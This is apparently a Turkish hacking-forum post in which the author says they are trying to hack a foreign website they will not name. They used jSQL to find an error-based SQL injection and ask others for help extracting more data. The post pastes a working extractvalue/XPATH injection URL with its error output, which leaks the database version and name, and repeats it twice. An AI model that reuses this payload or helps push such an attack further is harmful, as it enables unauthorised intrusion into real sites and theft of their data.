- 11 Tem 2015
- 71
- 0
merhabalar bir siteyi (siteyi vermek istemiyorum yabancı) jsql ile hacklemeye çalıştım. jsql en son link olarak xpath açığını kullandı. verdiği linkte veritabanı sürüm ve veritabanı adını buldu. netten araştırdım xpath açığı ile veritabanı bilgilerini alabilirim. ancak çok karışık yardım eder misiniz?
link;
xxxxxxxxxxx.com/xxxxxxxx.php?xxxx=xxxxx&id=0+and+1=extractvalue(0x0a,concat(0x0a,((select+concat(0x53714c69,mid((concat(concat_ws(0x04,version(),database(),user()),0x01030307)),1,99))))))--+
çıktı;
XPATH syntax error: ' SqLi5.1.73-cllxxxxt_newxxxxx' (veritabanı adı)
link;
xxxxxxxxxxx.com/xxxxxxxx.php?xxxx=xxxxx&id=0+and+1=extractvalue(0x0a,concat(0x0a,((select+concat(0x53714c69,mid((concat(concat_ws(0x04,version(),database(),user()),0x01030307)),1,99))))))--+
çıktı;
XPATH syntax error: ' SqLi5.1.73-cllxxxxt_newxxxxx' (veritabanı adı)
Moderatör tarafında düzenlendi: